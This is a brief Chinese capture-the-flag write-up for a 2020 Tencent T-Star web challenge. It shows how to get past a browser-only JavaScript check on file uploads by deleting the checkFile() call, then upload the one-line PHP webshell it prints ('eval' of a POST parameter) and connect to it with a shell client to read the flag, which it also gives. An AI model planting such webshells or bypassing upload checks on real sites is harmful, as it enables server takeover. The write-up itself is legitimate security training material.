2020 | 腾讯犀牛鸟网络安全 | T-Star-高校挑战赛 | Web
文件上传 JS 绕过
解题思路¶
- 题目需要上传一个
webshell到服务器,但是前端有 JS 校验,导致只能上传图片
hack.php<?php @eval($_POST['hack']);?> # hack 为菜刀连接使用的密码
- 使用开发者工具删除
onsubmit中调用checkFile()函数的过程,然后就可以直接上传 PHP 文件
- 打开菜刀,添加 SHELL
- 连接后,在
www目录下可以看到名为key的文件
- 内容即为 FLAG:
key{K735c9f0D7ddc3b9}
最后更新:
2021年12月13日 11:23:59
Contributors: